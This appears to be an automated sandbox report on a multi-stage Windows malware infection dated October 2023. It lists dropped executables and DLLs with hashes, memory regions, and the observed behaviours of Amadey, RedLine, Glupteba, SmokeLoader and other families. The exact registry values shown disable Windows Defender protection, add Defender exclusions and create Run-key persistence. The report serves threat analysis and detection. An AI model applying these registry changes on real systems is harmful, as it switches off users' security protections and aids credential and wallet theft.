memory/5732-344-0x0000000000400000-0x0000000000409000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

MD5 78e5bc5b95cf1717fc889f1871f5daf6
SHA1 65169a87dd4a0121cd84c9094d58686be468a74a
SHA256 7d2e2e4f369bcdbbe4a1d9acd299e230adc522d46e54f59e321622d80da02966
SHA512 d97bc87809e5f52cd015ced62488f738ea24a16c31d1fb836091b72112b200e304f0d8fab3ef762411b662ed60df0ca5fc24d4e98adb22b79e5e74a9292c1500

memory/5324-349-0x0000000072540000-0x0000000072CF0000-memory.dmp

memory/5552-351-0x0000000004430000-0x0000000004833000-memory.dmp

memory/5616-352-0x0000000072540000-0x0000000072CF0000-memory.dmp

memory/5552-353-0x0000000004840000-0x000000000512B000-memory.dmp

memory/5616-354-0x0000000005590000-0x00000000055A0000-memory.dmp

memory/5552-355-0x0000000000400000-0x000000000266D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\322E.exe

MD5 21b738f4b6e53e6d210996fa6ba6cc69
SHA1 3421aceeaa8f9f53169ae8af4f50f0d9d2c03f41
SHA256 3b1af64f9747985b3b79a7ce39c6625b43e562227dc2f96758118b2acb3e5e58
SHA512 f766a972fde598399091a82fc8db8d9edd25a9a5f9e5a0568769632091605eeb47bf3b44b69d37d51c1c7ab8be89cd4fb4846a5f06d719db885a35e049f1eb81

C:\Users\Admin\AppData\Local\Temp\322E.exe

MD5 21b738f4b6e53e6d210996fa6ba6cc69
SHA1 3421aceeaa8f9f53169ae8af4f50f0d9d2c03f41
SHA256 3b1af64f9747985b3b79a7ce39c6625b43e562227dc2f96758118b2acb3e5e58
SHA512 f766a972fde598399091a82fc8db8d9edd25a9a5f9e5a0568769632091605eeb47bf3b44b69d37d51c1c7ab8be89cd4fb4846a5f06d719db885a35e049f1eb81

C:\Users\Admin\AppData\Local\Temp\3432.exe

MD5 109da216e61cf349221bd2455d2170d4
SHA1 ea6983b8581b8bb57e47c8492783256313c19480
SHA256 a94bec1ee46f4a7e50fbccb77c8604c8c32b78a4879d18f923b5fa5e8e80d400
SHA512 460d710c0ffbe612ce5b07ae74abf360ebcf9e88993f2fc4448f31b96005f76f6902453c023477438b676f62de93e1c3e9ba980836c12dc5fc617728a9346e26

memory/5900-363-0x0000000000400000-0x000000000046F000-memory.dmp

memory/5960-364-0x00000000049C0000-0x00000000049F6000-memory.dmp

memory/5900-366-0x00000000005E0000-0x000000000063A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\3432.exe

MD5 109da216e61cf349221bd2455d2170d4
SHA1 ea6983b8581b8bb57e47c8492783256313c19480
SHA256 a94bec1ee46f4a7e50fbccb77c8604c8c32b78a4879d18f923b5fa5e8e80d400
SHA512 460d710c0ffbe612ce5b07ae74abf360ebcf9e88993f2fc4448f31b96005f76f6902453c023477438b676f62de93e1c3e9ba980836c12dc5fc617728a9346e26

memory/5960-368-0x0000000072540000-0x0000000072CF0000-memory.dmp

memory/5960-369-0x0000000004A40000-0x0000000004A50000-memory.dmp

memory/5960-373-0x0000000005080000-0x00000000056A8000-memory.dmp

memory/5960-371-0x0000000004A40000-0x0000000004A50000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\3721.exe

MD5 1199c88022b133b321ed8e9c5f4e6739
SHA1 8e5668edc9b4e1f15c936e68b59c84e165c9cb07
SHA256 e6bd7a442e04eba451aa1f63819533b086c5a60fd9fa7506fa838515184e1836
SHA512 7aa8c3ed3a2985bb8a62557fd347d1c90790cd3f5e3b0b70c221b28cb17a0c163b8b1bac45bc014148e08105232e9abef33408a4d648ddc5362795e5669e3697

memory/5732-380-0x0000000000400000-0x0000000000409000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\322E.exe

MD5 21b738f4b6e53e6d210996fa6ba6cc69
SHA1 3421aceeaa8f9f53169ae8af4f50f0d9d2c03f41
SHA256 3b1af64f9747985b3b79a7ce39c6625b43e562227dc2f96758118b2acb3e5e58
SHA512 f766a972fde598399091a82fc8db8d9edd25a9a5f9e5a0568769632091605eeb47bf3b44b69d37d51c1c7ab8be89cd4fb4846a5f06d719db885a35e049f1eb81

memory/2636-378-0x0000000008A80000-0x0000000008A96000-memory.dmp

memory/5900-377-0x0000000072540000-0x0000000072CF0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_srvym50m.nep.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/5980-390-0x0000000000400000-0x0000000000431000-memory.dmp

memory/5960-391-0x00000000057E0000-0x0000000005802000-memory.dmp

memory/6112-397-0x0000000000470000-0x000000000048E000-memory.dmp

memory/5980-389-0x00000000001C0000-0x00000000001DE000-memory.dmp

memory/6112-400-0x0000000072540000-0x0000000072CF0000-memory.dmp

memory/5960-401-0x00000000059A0000-0x0000000005A06000-memory.dmp

memory/5960-403-0x0000000005AE0000-0x0000000005B46000-memory.dmp

memory/5552-402-0x0000000004430000-0x0000000004833000-memory.dmp

memory/5960-405-0x0000000005B50000-0x0000000005EA4000-memory.dmp

memory/5552-404-0x0000000000400000-0x000000000266D000-memory.dmp

memory/6112-406-0x0000000004E90000-0x0000000004EA0000-memory.dmp

memory/5980-407-0x0000000004A80000-0x0000000004A90000-memory.dmp

memory/5980-408-0x0000000072540000-0x0000000072CF0000-memory.dmp

memory/5684-409-0x00007FF6FAFC0000-0x00007FF6FB561000-memory.dmp

memory/5552-410-0x0000000004840000-0x000000000512B000-memory.dmp

memory/5960-411-0x0000000005AB0000-0x0000000005ACE000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 1d95d08a88ae435fd3a7c4953f14969c
SHA1 0c79f2fe57e02c474ba3067c1470045c256f307d
SHA256 bd45fd215a885afe806c397b6abc9971a03eabe8f61f799f31171987080847ec
SHA512 f38692ce20ab5be6a6f246b2fa278d2eff69785982c380457f532ea9296a8fb270f960b7dbb880e6f7bfe05a527d36d78f1b7063883a4e10b9293fb15482c370

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe5841d6.TMP

MD5 9fb8fa88d40f3ebeef3a6590f9acc4f3
SHA1 a473a5d2b53fc4c552a7c24e84c02f5400ee5158
SHA256 70eb08618b27058acae15fe4d6a74d9fcde28f6f4cb2a2a7542027b7525c2053
SHA512 d7d943aca245de6484f01826dcd1b1d03f61c37d3d85cef907aae0d22823f7459b64ce6a4118458bb4f9635d49beebd1a72f9e4157fce86a493b3f113adf390b

memory/5616-421-0x0000000005830000-0x000000000584C000-memory.dmp

memory/5616-423-0x0000000005830000-0x0000000005845000-memory.dmp

memory/5616-422-0x0000000005830000-0x0000000005845000-memory.dmp

memory/5616-425-0x0000000005830000-0x0000000005845000-memory.dmp

memory/5616-427-0x0000000005830000-0x0000000005845000-memory.dmp

memory/5616-429-0x0000000005830000-0x0000000005845000-memory.dmp

memory/5616-431-0x0000000005830000-0x0000000005845000-memory.dmp

memory/5616-433-0x0000000005830000-0x0000000005845000-memory.dmp

memory/5980-434-0x0000000005E70000-0x0000000006032000-memory.dmp

memory/5616-436-0x0000000005830000-0x0000000005845000-memory.dmp

memory/5616-438-0x0000000005830000-0x0000000005845000-memory.dmp

memory/5616-441-0x0000000005830000-0x0000000005845000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 f4e6e8177624294ec3cafddfa26ec022
SHA1 929440008f4808f73ae5d78524cac158a435e679
SHA256 5c72e52052f3e2bb6aa5266cfc7b050d237b44740a6fa3e25503e64a143800ef
SHA512 0eac3ef7b6e68d3c98ec8a3ad1f2ac09c948269f48d4dac9859994343e9f68d2e29a315c23f691ce91f32db9d214191c331e76fb13d8172b7349c4151f25a97c

memory/5616-447-0x0000000005830000-0x0000000005845000-memory.dmp

memory/5616-459-0x0000000005830000-0x0000000005845000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 0046da21c89dbcc3bdac49a38f96cfe6
SHA1 a0bc44d24e83aaeb477e72076afd69244aaa98ef
SHA256 ed7770c18a76dd3a716b86d79adf970cec6baf3d8bae16897efc850c088df0bd
SHA512 99752d4ce064f48b4aa59468dfff24326bfe93253ee3246272653335d5d0a16dbd6a1c790ccacc8b9770a3134b5a046288aa41749df987a12a2d89c4c0975094

memory/5616-461-0x0000000005830000-0x0000000005845000-memory.dmp

memory/5480-464-0x0000000000400000-0x000000000047F000-memory.dmp

memory/5480-465-0x0000000000400000-0x000000000047F000-memory.dmp

memory/5480-467-0x0000000000400000-0x000000000047F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmp589C.tmp

MD5 02d2c46697e3714e49f46b680b9a6b83
SHA1 84f98b56d49f01e9b6b76a4e21accf64fd319140
SHA256 522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9
SHA512 60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac

C:\Users\Admin\AppData\Local\Temp\tmp58B1.tmp

MD5 6e98ae51f6cacb49a7830bede7ab9920
SHA1 1b7e9e375bd48cae50343e67ecc376cf5016d4ee
SHA256 192cd04b9a4d80701bb672cc3678912d1df8f6b987c2b4991d9b6bfbe8f011fd
SHA512 3e7cdda870cbde0655cc30c2f7bd3afee96fdfbe420987ae6ea2709089c0a8cbc8bb9187ef3b4ec3f6a019a9a8b465588b61029869f5934e0820b2461c4a9b2b

C:\Users\Admin\AppData\Local\Temp\tmp5931.tmp

MD5 49693267e0adbcd119f9f5e02adf3a80
SHA1 3ba3d7f89b8ad195ca82c92737e960e1f2b349df
SHA256 d76e7512e496b7c8d9fcd3010a55e2e566881dc6dacaf0343652a4915d47829f
SHA512 b4b9fcecf8d277bb0ccbb25e08f3559e3fc519d85d8761d8ad5bca983d04eb55a20d3b742b15b9b31a7c9187da40ad5c48baa7a54664cae4c40aa253165cbaa2

C:\Users\Admin\AppData\Local\Temp\tmp5946.tmp

MD5 f70aa3fa04f0536280f872ad17973c3d
SHA1 50a7b889329a92de1b272d0ecf5fce87395d3123
SHA256 8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8
SHA512 30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84

C:\Users\Admin\AppData\Local\Temp\tmp592B.tmp

MD5 349e6eb110e34a08924d92f6b334801d
SHA1 bdfb289daff51890cc71697b6322aa4b35ec9169
SHA256 c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a
SHA512 2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574

C:\Users\Admin\AppData\Local\Temp\tmp5991.tmp

MD5 d367ddfda80fdcf578726bc3b0bc3e3c
SHA1 23fcd5e4e0e5e296bee7e5224a8404ecd92cf671
SHA256 0b8607fdf72f3e651a2a8b0ac7be171b4cb44909d76bb8d6c47393b8ea3d84a0
SHA512 40e9239e3f084b4b981431817ca282feb986cf49227911bf3d68845baf2ee626b564c8fabe6e13b97e6eb214da1c02ca09a62bcf5e837900160cf479c104bf77

memory/5552-693-0x0000000000400000-0x000000000266D000-memory.dmp

C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll

MD5 a5b509a3fb95cc3c8d89cd39fc2a30fb
SHA1 5aff4266a9c0f2af440f28aa865cebc5ddb9cd5c
SHA256 5f3c80056c7b1104c15d6fee49dac07e665c6ffd0795ad486803641ed619c529
SHA512 3cc58d989c461a04f29acbfe03ed05f970b3b3e97e6819962fc5c853f55bce7f7aba0544a712e3a45ee52ab31943c898f6b3684d755b590e3e961ae5ecd1edb9

C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll

MD5 e913b0d252d36f7c9b71268df4f634fb
SHA1 5ac70d8793712bcd8ede477071146bbb42d3f018
SHA256 4cf5b584cf79ac523f645807a65bc153fbeaa564c0e1acb4dac9004fc9d038da
SHA512 3ea08f0897c1b7b5859961351eef59840bbf319a6ad7ebe1c9e1b5e2ce25588d7b1a37fd6c5417653521fc73f1f42eb043d0ee6fcd645aa92b8f305d726273b4

Analysis: behavioral1

Detonation Overview

Submitted

2023-10-10 20:02

Reported

2023-10-10 20:07

Platform

win7-20230831-en

Max time kernel

149s

Max time network

153s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

DcRat

rat infostealer dcrat
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\da66fedd7831c720e47597fda2295ebcb868479b9c21bc86646c523b99e3233c.exe N/A

Detects Healer an antivirus disabler dropper

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Healer

dropper healer

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\8FE5.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\8FE5.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\8FE5.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\8FE5.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\8FE5.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\8FE5.exe N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

Windows security bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\31839b57a4f11171d6abc8bbc4451ee4.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\system32\drivers\Winmon.sys C:\Windows\rss\csrss.exe N/A
File created C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A
File created C:\Windows\System32\drivers\etc\hosts C:\Program Files\Google\Chrome\updater.exe N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Possible attempt to disable PatchGuard

evasion

Stops running service(s)

evasion

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v7002600.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4248824.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\870B.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\jB0xw0Vd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8882.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Ay3zl0rC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\PJ9VB9fv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\893E.bat N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\IS2mS9Rs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\1ov99zg1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8CF7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8FE5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\93CC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\source1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\BD7C.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\C579.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\C922.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Windows\windefender.exe N/A
N/A N/A C:\Windows\windefender.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\da66fedd7831c720e47597fda2295ebcb868479b9c21bc86646c523b99e3233c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v7002600.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v7002600.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v7002600.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4248824.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\870B.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\870B.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\jB0xw0Vd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\jB0xw0Vd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Ay3zl0rC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Ay3zl0rC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\PJ9VB9fv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\PJ9VB9fv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\IS2mS9Rs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\IS2mS9Rs.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\1ov99zg1.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\93CC.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\BD7C.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\BD7C.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Windows\system32\taskeng.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A

Reads user/profile data of web browsers

spyware stealer

Windows security modification

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\31839b57a4f11171d6abc8bbc4451ee4.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\8FE5.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\8FE5.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup5 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP005.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\PJ9VB9fv.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\da66fedd7831c720e47597fda2295ebcb868479b9c21bc86646c523b99e3233c.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v7002600.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\870B.exe N/A
